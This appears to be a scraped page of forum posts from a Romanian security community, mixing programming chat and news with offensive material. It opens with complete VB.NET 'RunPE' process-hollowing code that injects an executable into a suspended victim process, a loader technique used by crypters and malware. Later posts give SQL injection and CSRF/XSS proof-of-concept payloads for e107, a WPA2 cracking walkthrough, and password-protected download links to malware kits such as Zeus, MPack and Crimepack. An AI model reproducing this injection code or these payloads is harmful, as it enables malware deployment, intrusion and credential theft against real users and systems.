&H10) 'DB 0-3,6,7 Public Const CONTEXT86_FULL = (CONTEXT86_CONTROL Or CONTEXT86_INTEGER Or CONTEXT86_SEGMENTS) Public Const CREATE_SUSPENDED = &H4 Public Const MEM_COMMIT As Long = &H1000& Public Const MEM_RESERVE As Long = &H2000& Public Const PAGE_NOCACHE As Long = &H200 Public Const PAGE_EXECUTE_READWRITE As Long = &H40 Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80 Public Const PAGE_EXECUTE_READ As Long = &H20 Public Const PAGE_EXECUTE As Long = &H10 Public Const PAGE_WRITECOPY As Long = &H8 Public Const PAGE_NOACCESS As Long = &H1 Public Const PAGE_READWRITE As Long = &H4 <DllImport("kernel32.dll")> _ Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInt32 End Function <DllImport("kernel32.dll")> _ Private Shared Function GetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean End Function <DllImport("kernel32.dll")> _ Private Shared Function SetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean End Function <DllImport("kernel32.dll")> _ Private Shared Function LoadLibraryA(ByVal lpLibFileName As String) As Integer End Function <DllImport("kernel32.dll")> _ Private Shared Function CreateProcess(ByVal lpApplicationName As String, _ ByVal lpCommandLine As String, ByRef lpProcessAttributes As SECURITY_ATTRIBUTES, _ ByRef lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Boolean, _ ByVal dwCreationFlags As UInt32, ByVal lpEnvironment As IntPtr, ByVal lpCurrentDirectory As String, _ <[In]()> ByRef lpStartupInfo As STARTUPINFO, _ <[Out]()> ByRef lpProcessInformation As PROCESS_INFORMATION) As Boolean End Function <DllImport("kernel32.dll", _ SetLastError:=True, _ CharSet:=CharSet.Auto, _ EntryPoint:="WriteProcessMemory", _ CallingConvention:=CallingConvention.StdCall)> _ Shared Function WriteProcessMemory( _ ByVal hProcess As IntPtr, _ ByVal lpBaseAddress As IntPtr, _ ByVal lpBuffer As Byte(), _ ByVal iSize As Int32, _ <Out()> ByRef lpNumberOfBytesWritten As Int32) As Boolean End Function <DllImport("kernel32.dll", _ SetLastError:=True, _ CharSet:=CharSet.Auto, _ EntryPoint:="WriteProcessMemory", _ CallingConvention:=CallingConvention.StdCall)> _ Shared Function WriteProcessMemoryI( _ ByVal hProcess As IntPtr, _ ByVal lpBaseAddress As IntPtr, _ ByVal lpBuffer As IntPtr, _ ByVal iSize As Int32, _ <Out()> ByRef lpNumberOfBytesWritten As Int32) As Boolean End Function <DllImport("kernel32.dll", EntryPoint:="ReadProcessMemory")> _ Public Shared Function ReadProcessMemory(ByVal hProcess As IntPtr, _ ByVal lpBaseAddress As Integer, _ ByRef lpbuffer As IntPtr, _ ByVal size As Integer, _ ByRef lpNumberOfBytesRead As Integer) As Int32 End Function <DllImport("ntdll.dll")> _ Public Shared Function ZwUnmapViewOfSection(ByVal hProcess As IntPtr, ByVal BaseAddress As IntPtr) As Long End Function <DllImport("kernel32.dll", SetLastError:=True, ExactSpelling:=True)> _ Public Shared Function VirtualAllocEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, _ ByVal dwSize As UInteger, ByVal flAllocationType As UInteger, _ ByVal flProtect As UInteger) As IntPtr End Function <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _ Public Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As UIntPtr, ByVal flNewProtect As UIntPtr, <Out()> ByVal lpflOldProtect As UInteger) As Integer End Function Const GENERIC_READ As Int32 = &H80000000 Const FILE_SHARE_READ As UInt32 = &H1 Const OPEN_EXISTING As UInt32 = 3 Const FILE_ATTRIBUTE_NORMAL As UInt32 = &H80 Const INVALID_HANDLE_VALUE As Int32 = -1 Const PAGE_READONLY As UInt32 = &H2 Const FILE_MAP_READ As UInt32 = &H4 Const IMAGE_DOS_SIGNATURE As UInt16 = &H5A4D Const RT_VERSION As Int32 = 16 Private Enum ImageSignatureTypes IMAGE_DOS_SIGNATURE = &H5A4D ''\\ MZ IMAGE_OS2_SIGNATURE = &H454E ''\\ NE IMAGE_OS2_SIGNATURE_LE = &H454C ''\\ LE IMAGE_VXD_SIGNATURE = &H454C ''\\ LE IMAGE_NT_SIGNATURE = &H4550 ''\\ PE00 End Enum Public Shared Sub SRexec(ByVal b() As Byte, ByVal sVictim As String) Dim sVersion As [String] = Nothing Dim pidh As IMAGE_DOS_HEADER Dim context As CONTEXT = New CONTEXT() Dim Pinh As IMAGE_NT_HEADERS Dim Pish As IMAGE_SECTION_HEADER Dim pi As PROCESS_INFORMATION = New PROCESS_INFORMATION() Dim si As STARTUPINFO = New STARTUPINFO() Dim pSec As SECURITY_ATTRIBUTES = New SECURITY_ATTRIBUTES() Dim tSec As SECURITY_ATTRIBUTES = New SECURITY_ATTRIBUTES() 'converts a data type in another type. 'since .net types are different from types handle by winAPI, DirectCall a API will cause a type mismatch, since .net types ' structure is completely different, using different resources. Dim MyGC As GCHandle = GCHandle.Alloc(b, GCHandleType.Pinned) Dim ptbuffer As Integer = MyGC.AddrOfPinnedObject.ToInt32 pidh = Marshal.PtrToStructure(MyGC.AddrOfPinnedObject, pidh.GetType) MyGC.Free() If CreateProcess(Nothing, sVictim, pSec, tSec, False, &H4, Nothing, Nothing, si, pi) = 0 Then Exit Sub End If Dim vt As Integer = ptbuffer + pidh.e_lfanew Pinh = Marshal.PtrToStructure(New IntPtr(vt), Pinh.GetType) Dim addr As Long, lOffset As Long, ret As UInteger si.cb = Len(si) context.ContextFlags = CONTEXT86_INTEGER 'all "IF" are only for better understanding, you could do all verification on the builder and then the rest on the stub If Pinh.Signature <> ImageSignatureTypes.IMAGE_NT_SIGNATURE Or pidh.e_magic <> ImageSignatureTypes.IMAGE_DOS_SIGNATURE Then Exit Sub If GetThreadContext(pi.hThread, context) And _ ReadProcessMemory(pi.hProcess, context.Ebx + 8, addr, 4, 0) >= 0 And _ ZwUnmapViewOfSection(pi.hProcess, addr) >= 0 Then Dim ImageBase As UInt32 = VirtualAllocEx(pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE) If ImageBase <> 0 Then WriteProcessMemory(pi.hProcess, ImageBase, b, Pinh.OptionalHeader.SizeOfHeaders, ret) lOffset = pidh.e_lfanew + 248 For i As Integer = 0 To Pinh.FileHeader.NumberOfSections - 1 'math changes, anyone with pe understanding know Pish = Marshal.PtrToStructure(New IntPtr(ptbuffer + lOffset + i * 40), Pish.GetType) Dim braw(Pish.SizeOfRawData) As Byte 'more math for reading only the section. mm API has a "shortcut" when you pass a specified startpoint. '.net can't use so you have to make a new array For j As Integer = 0 To Pish.SizeOfRawData - 1 braw(j) = b(Pish.PointerToRawData + j) Next WriteProcessMemory(pi.hProcess, ImageBase + Pish.VirtualAddress, braw, Pish.SizeOfRawData, ret) VirtualProtectEx(pi.hProcess, ImageBase + Pish.VirtualAddress, Pish.Misc.VirtualSize, Protect(Pish.Characteristics), addr) Next i Dim bb As Byte() = BitConverter.GetBytes(ImageBase) WriteProcessMemory(pi.hProcess, context.Ebx + 8, bb, 4, ret) context.Eax = ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint Call SetThreadContext(pi.hThread, context) Call ResumeThread(pi.hThread) End If End If End Sub Private Shared Function Protect(ByVal characteristics As Long) As Long Dim mapping() As Object = {PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, _ PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, _ PAGE_READWRITE, PAGE_EXECUTE_READWRITE} Protect = mapping(RShift(characteristics, 29)) End Function Private Shared Function RShift(ByVal lValue As Long, ByVal lNumberOfBitsToShift As Long) As Long RShift = vbLongToULong(lValue) / (2 ^ lNumberOfBitsToShift) End Function Private Shared Function vbLongToULong(ByVal Value As Long) As Double Const OFFSET_4 = 4294967296.0# If Value < 0 Then vbLongToULong = Value + OFFSET_4 Else vbLongToULong = Value End If End Function End Class Usage: SRexec(something, Application.ExecutablePath) Sursa: [VB.Net] RunPe's Thread - r00tsecurity
  6. Javascript Deobfuscation Tools (Part 1) Posted on June 17, 2011 by darryl Deobfuscating Javascript can be tricky so why not make the job easier by using a tool? There’s several tools that can help you deobfuscate Javascript. Before I get to those tools, I wanted to show you how to deobfuscate them manually. I’ve been getting a lot of requests from folks who want to learn how to deobfuscate malscripts so this article is for you. Let’s have a look at the malicious scripts. These scripts were found in the wild and randomly selected based on its difficulty. I’ve uploaded these scripts to Pastebin.com so you can play along (warning, these are real malicious scripts so take the necessary precautions!). Sample 1 This script is simple and should be easy for the tools to handle. There are interweaving comments that do nothing but throw you off visually. The script concatenates a long string of hex characters which are converted to text and reversed. Each text character is then searched for in a string and a corresponding new character is referenced. Here’s the string that the characters are searched for and the second line is the converted value: SP%cpH2W5C83fEX:1rjF9AQdMlKi/sk4GuvtxJOBm_U.NqzY7aw&nhgZoVT=0IbRDye?6-L 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=% For example, if the first value is “L”, it will be converted to “%”. These new characters are joined together to form another string of hex characters which are finally unescaped to form the final script. Here’s what you can do to see the final script: And this is what you get: ince this article is about tools, here’s a program that I wrote. It’s called Revelo (which is Latin for “reveal”) but it’s not quite ready for public release. This tool automates some of the manual changes I make to the scripts to deobfuscate the code. It’s not a debugger and more like a set of tools. Revelo has a built-in packet sniffer and proxy so I can capture the resulting HTTP request and see the URLs without actually visiting the site. It also has a built-in firewall to protect my PC from accidental redirects. Besides that, it can also reveal the actual deobfuscated code. I select the “Enclose Javascript in TextArea” option and get the resulting code: Mai sunt inca 2 exemple. Articol complet: http://www.kahusecurity.com/2011/javascript-deobfuscation-tools-part-1/
  7. WebGL – More WebGL Security Flaws James Forshaw, Paul Stone, Michael Jordon 16th June 2011 Summary In this blog post Context demonstrates how to steal user data through web browsers using a vulnerability in Firefox’s implementation of WebGL. This is a continuation of our research into serious design flaws that could affect any browser which implements WebGL, currently Chrome and Firefox. Context has been researching the new 3D graphics technology, WebGL, which allows web pages to draw fast 3D graphics in a similar manner to computer games. This exciting technology has the capability to deliver a much richer experience to web users. However, to enable this impressive breakthrough in online technology, web browsers (currently Chrome and Firefox) have had to expose low level parts of their operating systems which previously could not be directly accessed by potentially malicious web pages, thus creating a number of potential security vulnerabilities. Context identified this (and other) issues with WebGL by evaluating Chrome and Firefox WebGL implementations against the conformance test suite devised by Khronos, the consortium which draws up the WebGL specification. We have established that none of the current implementations comply with this standard. Furthermore, Context’s research found that Khronos’ recommended defence against the DoS issue (WebGL_ARB_robustness) is not fit for purpose. First, only certain chipsets and operating systems (NVidia on Windows and Linux) support this feature. Moreover, this extension only offers mitigation, not a comprehensive solution to WebGL DoS issues. In the video below, we show how anyone running Firefox 4 with WebGL support is vulnerable to having malicious web pages capture screenshots of any window on their system. These screenshots could be of other web pages, the user’s desktop and other applications that run on their system. Background In our first blog Context outlines serious security concerns related to the use of WebGL. We were able to steal images from other web pages and crash people’s machines (Denial of Service, or DoS) from a malicious website. These examples showed the danger of allowing malicious code to run on graphics cards which were never designed to defend against this threat. After reviewing our previous work Firefox has now removed support for cross-domain images (https://hacks.mozilla.org/2011/06/cross-domain-webgl-textures-disabled-in-firefox-5); while Khronos is updating the WebGL specification to include protection from DoS (using a new OpenGL extension GL_ARB_robustness) and Cross-Origin Resource Shading (CORS) attacks (WebGL Security - khronos.org news). The fact that it is doing so begs the question as to whether this technology was specified, designed and implemented with security in mind. The problems we identified in our first blog were examples of the types of issues that can be created as a result of WebGL use. It is not totally unexpected or unusual for there to be security issues associated with a new technology, but it is crucial that the standard and the correct mitigation processes are quickly adjusted once such problems are identified to ensure that end user security is not compromised. To this end Context reviewed the conformance tests that Khronos has provided for WebGL vendors to use in assessing compliance to the standard. Through this work Context has discovered that neither Chrome nor Firefox passed the Khronos tests, including a number that are directly related to security. Context then explored the consequences of one of the failed conformance tests: the issue it identified allowed us to extract images containing data from the user’s desktop and from other web browser sessions such as authenticated pages. This issue was specific to Firefox and will be fixed in the next version of the browser. If you are concerned by WebGL based attacks see our FAQ for details on whether you are vulnerable and if so how to protect yourself. Articol complet: http://www.contextis.com/resources/blog/webgl2/
  8. File path injection in PHP ? 5.3.6 file upload (CVE 2011-2202) Saturday, June 18, 2011 Since the thing went public before new PHP version has been released, I present full details of the latest PHP vulnerability I reported - together with some sweet demo exploit. The issue was found with fuzzing being part of my recent file upload research. And I still have some more to show in the future My thanks go to Pawe? Gole? who helped analyze the vulnerability. The PHP Part The whole issue is tracked as PHP bug #54939, but the website is now down. The exemplary exploit is at pastebin. The nature of the bug is simple. PHP claims to remove the path component from HTTP file upload forms (transferred as MIME multipart/form-data requests), leaving only the file name given by the user agent. This is both for security, and to fix MSIE incompatibility (IE used to send full path like this: c:\WINDOWS\WHATEVER\My_file.txt). However, in 2008 PHP developers made a off-by-one error, and, as a result, if a name starts with \ or / and has no other (back)slashes, it's left as-is. So, this allows for: /vmlinuz /autorun.inf (/ will map to C:\ in WINDOWS - the drive where your PHP is run from) /boot.ini and other interesting file "names" to pass through. The application part Of course, what this means is simply that $_FILES[$input_field_name]['name'] will contain unsanitized file path - and that's not enough to complete an exploit. PHP script would need to use that filename as a destination for file writing. Unfortunately, at least a few applications do. I've found some pretty interesting examples. Among them is this AjaxFileUpload plugin. There are more applications with the same approach - just go on looking! AjaxFileUpload simply passes the given file "name" to move_uploaded_file(), which would try to create/overwrite a file in a root directory... The set up part And that will most likely fail, because of insufficient permissions. Who on Earth would allow PHP to write to root? Well, default Apache installation on Windows systems is run as a SYSTEM user (a.k.a root). Also, for some shared hostings PHP is run in a chroot-ed environment, and / is the document root of a website (which allows for an easy site defacement). It's tricky, I agree, that's why this bug is v. difficult to exploit in the wild (luckily). But it's possible! Today's Heroes: WAMP server, newest version (PHP 5.3.5), default install PHP <= 5.3.6, (5.3.5 in the demo) Windows XP AjaxFileUpload - A jQuery plugin that simulates asynchronous file uploads. In the exploit I simply show that (thanks to vulnerable set up) I can overwrite c:\boot.ini and make the system unbootable. There are more advanced scenarios that could be done (essentially I can supply a boot record file to use on next boot), but it's not my area of expertise. To upload a file, the HTML5 arbitrary file upload technique was used. So, patch your PHPs and bye! Sursa si video demonstrativ: http://blog.kotowicz.net/2011/06/file-path-injection-in-php-536-file.html
      • 1
      • Upvote
  9. e107 0.7.25 Cross Site Scripting / SQL Injection Cred ca inca e destul de folosit... Vulnerability ID: HTB23004 Reference: http://www.htbridge.ch/advisory/multiple_vulnerabilities_in_e107_1.html Product: e107 website system Vendor: e107 ( http://e107.org/ ) Vulnerable Version: 0.7.25 and probably prior Tested on: 0.7.25 Vendor Notification: 25 May 2011 Vulnerability Type: Multiple Vulnerabilities Risk level: Medium Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) Vulnerability Details: 1. SQL injection in e107 The vulnerability exists due to failure in the "/e107_admin/users_extended.php" script to properly sanitize user-supplied input in "user_field" variable. "magic_quotes" must be set to "off". Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database. Attacker can use browser to exploit this vulnerability. The following PoC code is available: POST /e107_admin/users_extended.php?cat= HTTP/1.1 Host: HOST Cookie: <valid session cookies> Content-Type: application/x-www-form-urlencoded Content-Length: user_field=sss','',0, ','','', '0', '253','0','0','253','0','0'),('0',(select user()),'',0,'','','','0','253','0','0','253','0','0'),('0','dfg&user_applicable=253&user_read=0&user_write=253&add_category=Add+category 2. XSS in e107 User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the "/e107_admin/users_extended.php" script to properly sanitize user-supplied input in "user_include" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC code is available:: poc.html <script> setTimeout("document.getElementById('f1').src='http://HOST/e107_admin/users_extended.php'",2000); </script> <iframe id=f1 src='form.html'></iframe> form.html <form method="POST" action="http://HOST/e107_admin/users_extended.php?editext" name=m> <input type="hidden" name="user_field" value="abcde1f1"> <input type="hidden" name="user_text" value="12121"> <input type="hidden" name="user_type" value="1"> <input type="hidden" name="user_include" value='"><script>alert(document.cookie)</script>'> <input type="hidden" name="add_field" value="1"> <input type="hidden" name="user_parent" value="0"> <input type="hidden" name="user_required" value="0"> <input type="hidden" name="user_applicable" value="255"> <input type="hidden" name="user_read" value="0"> <input type="hidden" name="user_write" value="253"> <input type="hidden" name="user_hide" value="0"> <input type=submit> </form> <script> document.m.submit(); </script> Sursa: e107 0.7.25 Cross Site Scripting / SQL Injection ? Packet Storm
  10. Why SSDs are worth the money Here's a great, sweary presentation from Artur Bergman about the joy of using SSDs in your laptop and data-center, and how it's totally, absolutely worth the expense of replacing spinning drives with solid-state drives. I've been solid-state for more than a year, and I totally, absolutely agree. Video: http://www.boingboing.net/2011/06/17/why-ssds-are-worth-t.html
  11. Learn Python The Hard Way, 2nd Edition This is the HTML preview of Learn Python The Hard Way, 2nd Edition. It is a work in progress and will most likely have some errors as I work on the full release of the 2nd Edition. The Hard Way Is Easier Exercise 0: The Setup Exercise 1: A Good First Program Exercise 2: Comments And Pound Characters Exercise 3: Numbers And Math Exercise 4: Variables And Names Exercise 5: More Variables And Printing Exercise 6: Strings And Text Exercise 7: More Printing Exercise 8: Printing, Printing Exercise 9: Printing, Printing, Printing Exercise 10: What Was That? Exercise 11: Asking Questions Exercise 12: Prompting People Exercise 13: Parameters, Unpacking, Variables Exercise 14: Prompting And Passing Exercise 15: Reading Files Exercise 16: Reading And Writing Files Exercise 17: More Files Exercise 18: Names, Variables, Code, Functions Exercise 19: Functions And Variables Exercise 20: Functions And Files Exercise 21: Functions Can Return Something Exercise 22: What Do You Know So Far? Exercise 23: Read Some Code Exercise 24: More Practice Exercise 25: Even More Practice Exercise 26: Congratulations, Take A Test! Exercise 27: Memorizing Logic Exercise 28: Boolean Practice Exercise 29: What If Exercise 30: Else And If Exercise 31: Making Decisions Exercise 32: Loops And Lists Exercise 33: While Loops Exercise 34: Accessing Elements Of Lists Exercise 35: Branches and Functions Exercise 36: Designing and Debugging Exercise 37: Symbol Review Exercise 38: Reading Code Exercise 39: Doing Things To Lists Exercise 40: Dictionaries, Oh Lovely Dictionaries Exercise 41: Gothons From Planet Percal #25 Exercise 42: Gothons Are Getting Classy Exercise 43: You Make A Game Exercise 44: Evaluating Your Game Exercise 45: Is-A, Has-A, Objects, and Classes Exercise 46: A Project Skeleton Exercise 47: Automated Testing Exercise 48: Advanced User Input Exercise 49: Making Sentences Exercise 50: Your First Website Exercise 51: Getting Input From A Browser Exercise 52: Testing The Web Application Next Steps Advice From An Old Programmer Indices and tables Index Module Index Search Page Online: http://learnpythonthehardway.org/book/
  12. Cracking WPA2 Tutorial June 16th, 2011 | By: Andrew Whitaker| In this video we will demonstrate how to crack WPA2 using the Airmon-ng suite. We will do it by: Identifying an access point Capturing traffic from that access point Attempt to capture the handshake. We have two options for doing this. We can wait for a client to connect on their own We can run a deauth attack to force them to disconnect and then you can capture the handshake then . Once you have captured the handshake, you can attempt to crack it with a word list or a rainbow table. The key can then be found from there. Enjoy. Youtube: http://www.youtube.com/watch?v=pvjMJKUfAjo Sursa: Cracking WPA2 Tutorial | InfoSec Resources
  13. Malware Sourcecode Mpack: http://www.secguru.com/files/MPack_Toolkit_v0.94.rar (pass: infected) Crimepack: MEGAUPLOAD - The leading online storage and file delivery service IncognitoRat: http://incognitorat.com/db/Files GhostRat: MEGAUPLOAD - The leading online storage and file delivery service Exe2Vbs: PURGATORY VIRUS TEAM - Exe2Vbs v1.6 Zeus: http://www.mdl4.com/files/zeus.rar (pass:zeus) Stuxnet: https://github.com/Laurelai/decompile-dump/zipball/master ZeroAccess/Max++(64Bit): http://resources.infosecinstitute.com/wp-content/uploads/Max++-downloader-install_2010.zip Posted by Satyam Pujari a.k.a Satyamhax Sursa: ::eSploit::: Malware Sourcecode
  14. Aoleu, cred ca C++ este cel mai bine structura limbaj din perspectiva OOP. Poate doar C# il poate surclasa...
  15. Am început cu programele mici in Visual Basic 6. Apoi am pus mana pe o carte de 900 de pagini (Visual Basic 6 - Manualul programatorului) si pe una de vreo 700 (Visual Basic 5 - 1001 de exemple, cam asa ceva) si am inteles limbajul. Cu testele pe diferite API-uri Windows, citind documentatia de pe MSDN pe care initial nu o citeam ci doar banuiam ce fac acele functii, am inceput sa inteleg perfect cum sta treaba. Si cotrobaiam prin multe coduri sursa de unde am invatat multe. Apoi am trecut pe PHP, am citit "Initiere in PHP 5" - Steve Holzner apoi "PHP 4 in imagini" si am invatat cam tot ce imi trebuia la inceput. HTML stiam deja partial, si din ce mai facusem la scoala... Iar MySQL din capitolele dedicate acestui SGBDR din cartile enumerate. Cu timpul am citit si documentatia multor functii de pe php.net si intreg capitolul dedicat PHP 5 - OOP, si multe alte lucruri de pe php.net. Si din coduri sursa am mai invatat cate ceva. Am trecut apoi si la o cartulie de JavaScript si vreau sa invat notiuni mai avansate de MySQL. C++ am invatat din liceu, dar nu mare lucru. Abia anul acesta m-am apucat serios de OOP (facultate) si e singura materie care mi-a placut si la care am inteles cam toate prostiile, cat de marunte, de la mostenire virtuala la RTTI. Am citit "C++ manual complet" - Herbert Schildt, "C++ pentru incepatori volumul II" - Liviu Negreanu, am retinut multe idei din "Secrete C++" - Constantin Galatean... Am citit si o carte despre Java si anume "Java de la 0 la expert" care mi s-a parut cea mai buna carte de programare citita, si o carte despre "Perl", dar nu m-au pasionat aceste limbaje si nu mai stiu mare lucru, nu prea le-am folosit. Pe Linux, shell scriping nu stiu cine stie ce, doar idile de baza, citite intr-un articol, doua si din citirea si modificarea diverselor fisiere de sistem. Eu nu pot citi carti pe calculator, nu suport, prefer formatul pe hartie. Si imi place sa citesc, citeam si literatura... In fine, asta e ideea mea de baza: invatati din carti! Una e sa iti explice cineva care lucreaza de ani de zile in domeniu, alta e sa iti explice Vasile de 12 ani care a inteles si el dintr-un tutorial ca daca pui "echo 'Plm';" apare pe site "Plm". Ca tot veni vorba: degeaba invatati un limbaj de programare daca nu lucrati des in el. Faceti proiecte! Cat mai multe si cat mai complexe. Va veti trezi ulterior ca vreti sa va angajati si... CV? Ce o sa treceti acolo? Conteaza proiectele foarte mult, cat de mici. Ca sugestie: faceti-va acum un CV. Si o sa vedeti ca nu prea aveti ce trece acolo. Da, puteti spune ca stiti n limbaje de programare, dar la interviuri se intreaba: - C: scrie in C o functie care inverseaza o lista simplu inlantuita - C++: se da un exemplu cu o functie virtuala si upcasting, sa spui daca codul e corect sau nu (daca vreti sa vedeti cate rahaturi pot sa apara in programe OOP in C++ postati aici si o sa vedeti ca nu e atat de usor sa fii un compilator uman) - PHP: se da o clasa, se serializeaza apoi se deserializeaza un obiect, cu __sleep si __wakeup de riguare. Ce se va afisa daca nu stiu ce... - PHP: se da o clasa abstracta, se mosteneste dar nu se implementeaza toate metodele bla bla... In fine, sunt foarte multe lucruri. Daca nu cititi o documentatie serioasa, gen CARTE nu aveti de unde sa le stiti. Sfatul meu: CITITI!
  16. Nu e cine stie ce, trebuia sa fie bazat pe expresii regulate, asa ar fi fost de preferat. Oricum, nu are cum sa detecteze exact o vulnerabilitate, detecteaza partial cod potential vulnerabil. De exemplu, SQL Injection se gaseste la interogari, efectuate de exemplu cu mysql_query. Programul cauta dupa aceste apeluri.
  17. S-a lansat Kaspersky Endpoint Security 8 for Linux Securitate | 17 Iunie 2011 Kaspersky Lab anun?? lansarea solu?iei business Kaspersky Endpoint Security 8 for Linux, care combin? toate func?ionalit??ile versiunii anterioare de Kaspersky Anti-Virus 5.7 for Linux cu cele ale Kaspersky Anti-Virus 5.5 for Samba. Administrarea produsului este realizat? prin intermediul unei interfe?e grafice intuitive, care este pe deplin compatibil? cu ecosistemele desktop Gnome ?i KDE. De asemenea, parametrii programului pot fi configura?i ?i din fereastra de comand? (command line). Kaspersky Endpoint Security 8 for Linux face parte din linia de solu?ii de securitate dedicate companiilor ?i poate fi integrat? în infrastructura de securitate a organiza?iei. Aceasta este compatibil? cu toate distribu?iile de Linux, atât pe 32, cât ?i pe 64 de bi?i. Kaspersky Endpoint Security 8 for Linux ofer? protec?ie complet? sta?iilor de lucru care opereaz? pe sisteme Linux, datorit? urm?toarelor inova?ii: • Solu?ia include noul motor antivirus – Kaspersky Anti-Virus Engine 8.0, un modul de analiz? euristic? ?i suport pentru dezinfectarea fi?ierelor stocate în arhive. • Kaspersky Endpoint Security 8 for Linux neutralizeaz? cu succes amenin??rile informatice care ?intesc sistemele de operare Linux, precum ?i pe cele care atac? platformele Windows ?i Mac OS X. Astfel, suita ofer? protec?ie complet? întregii re?ele a companiei, care include ?i sta?ii de lucru care nu opereaz? numai pe Linux. • Noul produs include consola Kaspersky Administration Kit 8.0, o interfa?? centralizat? de management care ofer? posibilitatea administr?rii de la distan??, vizualizarea de rapoarte ?i modificarea politicilor globale de securitate. „Kaspersky Endpoint Security 8 for Linux extinde oportunit??ile disponibile companiilor în termeni de securitate informatic? ?i permite acestora s? implementeze sisteme pentru protec?ia infrastructurii IT, indiferent de platformele de operare folosite pe sta?iile de lucru. Noua versiune a produsului ofer? protec?ie complet? computerelor cu Linux ?i include instrumentele necesare pentru configurarea, controlul ?i gestionarea politicilor centralizate de securitate”, a spus Teodor Cimpoe?u, Managing Director Kaspersky Lab România ?i Bulgaria. Sursa: S-a lansat Kaspersky Endpoint Security 8 for Linux | Agora.ro
  18. Pentru cei care cauta vulnerabilitati in codul sursa e painea lui Dumnezeu.
  19. Au strans 150.000 de "fani" pe twitter. Si i-au pus sa sune la un anumit numar. Apelurile erau redirectionate care Wow Call Center de exemplu. Si cica sunt "1337"... Ratati...
  20. Eu am zis parerea mea in alt topic. Au fost niste atacuri la diverse site-uri, care erau deja revendicate de "x" si "y" apoi se trezesc ratatii astia si zic ca ei sunt "hackerii". La fel si cu pron.com de exemplu, cred ca mai intai a fost gasit de Tinko de al nostru apoi se trezesc ratatii astia sa zica ca ei l-au gasit. De fapt nici nu zic, doar ca se trezesc niste rahati imputiti din presa (muie presei) care ii promoveaza,
  21. DDOS. Ratati. Tot e posibil sa nu fi avut nicio legatura. Script-kiddies. De exemplu au postat un nr. de telefon pe twiter, ratatii au sunat si redirectionau apelurile la diverse Call-Centers ale anumitor companii. Ce "1337"... Copii fara viitor.
  22. Probabil: - Florin Salam - Am norocul scris in frunte :->
  23. Ne ia 2 minute sa facem o asemenea pagina, de ce am plati pentru ea? Da, nu ai nimerit unde trebuie, nu gasesti aici clienti pentru asemenea porcarii.
  24. JavaScript PDF Reader Interesanta idee... Download: https://github.com/andreasgal/pdf.js https://raw.github.com/andreasgal/pdf.js/master/pdf.js
  25. The Art of the Cyberwar The development of new technologies, in catching up with military interests and dependence on existing technology by developed countries, sets up a scenario where the cyber war, or war in cyberspace, is becoming more important. All countries aware of the risks of such dependence developed defense programs against attacks that could jeopardize critical national infrastructure. On the other hand, developing countries and major world powers are training computer security experts in various techniques of hacking, cracking, virology, etc.., forming true experts in cyber warfare, called cyberwarriors. That does not fit anyone doubt that the future wars will not be determined or land or sea or air, but in cyberspace. The soldiers do not carry weapons or shields, but knowledge and deploy applications that war virus, disabling the enemy's critical systems that are technologically dependent. This is the scenario where the world is moving now, a scenario of technological dependence, where countries with more traditional military strength will be losing ability to war for countries with highly qualified in computer security and cyber techniques. This essay is intended as a point of reflection and knowledge about cyber warfare, on the present philosophy of Sun Tzu in the Art of War, and adapt their knowledge to technological scenario which we live and live, so we can get a modern compendium: The Art of Cyberwar. Download: http://www.malwareint.com/docs/the-art-of-the-cyberwar-en.pdf
×
×
  • Create New...